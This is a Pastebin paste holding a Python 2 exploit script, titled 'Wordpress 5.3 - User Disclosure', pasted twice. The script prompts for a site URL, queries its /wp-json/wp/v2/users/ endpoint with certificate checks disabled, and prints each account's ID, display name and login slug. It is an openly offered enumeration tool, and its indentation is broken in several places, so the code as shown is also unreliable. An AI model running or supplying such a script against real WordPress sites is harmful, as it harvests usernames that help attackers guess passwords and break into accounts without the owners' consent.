Advertisement
RedBirdTeam

Exploit Wordpress 5.3 - User Disclosure

Nov 29th, 2019
1,216
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.49 KB | None | 0 0
  1. # Exploit Title : Wordpress 5.3 - User Disclosure
  2. # Author: SajjadBnd
  3. # Date: 2019-11-17
  4. # Software Link: https://wordpress.org/download/
  5. # version : wp < 5.3
  6. # tested on : Ubunutu 18.04 / python 2.7
  7. # CVE: N/A
  8.  
  9.  
  10. #!/usr/bin/python
  11. # -*- coding: utf-8 -*-
  12. #
  13.  
  14.  
  15. import requests
  16. import os
  17. import re
  18. import json
  19. import sys
  20. import urllib3
  21.  
  22. def clear():
  23.     linux = 'clear'
  24.     windows = 'cls'
  25.     os.system([linux, windows][os.name == 'nt'])
  26. def Banner():
  27.         print('''
  28. - Wordpress < 5.3 - User Enumeration
  29. - SajjadBnd
  30. ''')
  31. def Desc():
  32.     url = raw_input('[!] Url >> ')
  33.     vuln = url + "/wp-json/wp/v2/users/"
  34.     while True:
  35.         try:
  36.             r = requests.get(vuln,verify=False)
  37.             content = json.loads(r.text)
  38.             data(content)
  39.         except requests.exceptions.MissingSchema:
  40.         vuln = "http://" + vuln
  41. def data(content):
  42.     for x in content:
  43.     name = x["name"].encode('UTF-8')
  44.     print("======================")
  45.     print("[+] ID : " + str(x["id"]))
  46.     print("[+] Name : " + name)
  47.     print("[+] User : " + x["slug"])
  48.     sys.exit(1)
  49. if __name__ == '__main__':
  50.     urllib3.disable_warnings()
  51.     reload(sys)
  52.     sys.setdefaultencoding('UTF8')
  53.     clear()
  54.     Banner()
  55.     Desc()
  56.  
  57. wpuser.txt
  58.  
  59. #!/usr/bin/python
  60. # -*- coding: utf-8 -*-
  61. #
  62. # Exploit Title : Wordpress < 5.3 - User Disclosure
  63. # Exploit Author: SajjadBnd
  64. # email : blackwolf@post.com
  65. # Software Link: https://wordpress.org/download/
  66. # version : wp < 5.3
  67. # tested on : Ubunutu 18.04 / python 2.7
  68.  
  69. import requests
  70. import os
  71. import re
  72. import json
  73. import sys
  74. import urllib3
  75.  
  76. def clear():
  77.     linux = 'clear'
  78.     windows = 'cls'
  79.     os.system([linux, windows][os.name == 'nt'])
  80.  
  81. def Banner():
  82.         print('''
  83. - Wordpress < 5.3 - User Enumeration
  84. - SajjadBnd
  85. ''')
  86.  
  87. def Desc():
  88.     url = raw_input('[!] Url >> ')
  89.     vuln = url + "/wp-json/wp/v2/users/"
  90.     while True:
  91.         try:
  92.             r = requests.get(vuln,verify=False)
  93.             content = json.loads(r.text)
  94.             data(content)
  95.         except requests.exceptions.MissingSchema:
  96.         vuln = "http://" + vuln
  97.  
  98. def data(content):
  99.     for x in content:
  100.     name = x["name"].encode('UTF-8')
  101.     print("======================")
  102.     print("[+] ID : " + str(x["id"]))
  103.     print("[+] Name : " + name)
  104.     print("[+] User : " + x["slug"])
  105.     sys.exit(1)
  106. if __name__ == '__main__':
  107.     urllib3.disable_warnings()
  108.     reload(sys)
  109.     sys.setdefaultencoding('UTF8')
  110.     clear()
  111.     Banner()
  112.     Desc()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement